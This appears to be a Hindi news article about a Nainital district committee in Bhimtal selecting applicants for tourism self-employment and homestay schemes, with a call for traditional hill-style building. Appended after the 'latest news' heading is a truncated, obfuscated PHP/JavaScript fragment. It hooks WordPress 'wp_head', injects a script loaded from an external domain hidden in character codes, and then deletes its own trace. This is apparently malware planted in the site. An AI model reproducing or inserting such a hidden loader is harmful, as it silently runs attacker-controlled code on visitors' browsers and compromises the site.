Saturday, July 27, 2024
spot_img

भीमताल : होमस्टे योजना व गैर वाहन मद के अंतर्गत भवन निर्माण में पहाड़ी थीम,पारंपरिक काष्ट व पठाल शैली का प्रयोग किया जाय-डॉ. संदीप तिवारी

भीमताल /नैनीताल ::- पर्यटन विभाग द्वारा आयोजित वीर चंद्र सिंह गढ़वाली पर्यटन स्वरोजगार योजना एवं दीनदयाल उपाध्याय गृह आवास होमस्टे विकास योजना के अंतर्गत चयनित आवेदकों के साक्षात्कार के लिए ज़िला चयन समिति की बैठक मुख्य विकास अधिकारी डॉ. संदीप तिवारी की अध्यक्षता में विकास भवन भीमताल में आयोजित की गई।

बैठक में डॉ. तिवारी ने कहा कि होमस्टे योजना व गैर वाहन मद के अंतर्गत भवन निर्माण में पहाड़ी थीम अर्थात पारंपरिक काष्ट व पठाल शैली का प्रयोग किया जाय। इससे पहाड़ी परम्परा से देश विदेश के पर्यटक रूबरू हो सकेंगे व उत्तराखंड को अपनी विशिष्ट पहचान मिलेगी। उन्होंने पर्यटन अधिकारी बृजेन्द्र पांडेय को निर्देश दिये कि भविष्य में योजना के अंतर्गत आवेदन करने वाले आवेदकों की पत्रावलियों को समस्त दस्तावेजों के साथ पूर्ण कर सबंधित बैंकों को प्रेषित किया जाय। आवेदकों को अनावश्यक बैंक व विभाग के चक्कर न लगाने पड़े, इसका लीड बैंक अधिकारी व पर्यटन अधिकारी विशेष ध्यान रखे।

वीर चंद्र सिंह गढ़वाली पर्यटन स्वरोजगार योजना में वाहन मद के अन्तर्गत 13 आवेदक, गैर वाहन मद में 09 आवेदक व दीनदयाल उपाध्याय गृह आवास होम स्टे विकास योजना के अंतर्गत 08 आवेदकों के द्वारा आवेदन किया गया था। उक्त आवेदन पत्रों का निरीक्षण एवं परीक्षण करने के उपरांत समिति द्वारा वाहन मद में 11, गैर वाहन मद में 09 एवं होम स्टे योजना के अंतर्गत 07 आवेदकों के आवेदन को वित्त पोषण हेतु योजना के अंतर्गत चयन किया गया। मुख्य विकास अधिकारी ने इन पत्रावलियों को संबंधित बैंक शाखाओ को वित पोषण हेतु तत्काल भेजे जाने के निर्देश पर्यटन अधिकारी को दिए।

बैठक में महाप्रबन्धक उद्योग सुनील कुमार पंत, एआरटीओ रश्मि भट्ट, डीडीएम विशाल कुमार, एएलडीएम वैभव प्रताप सिंह आदि मौजूद रहे।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>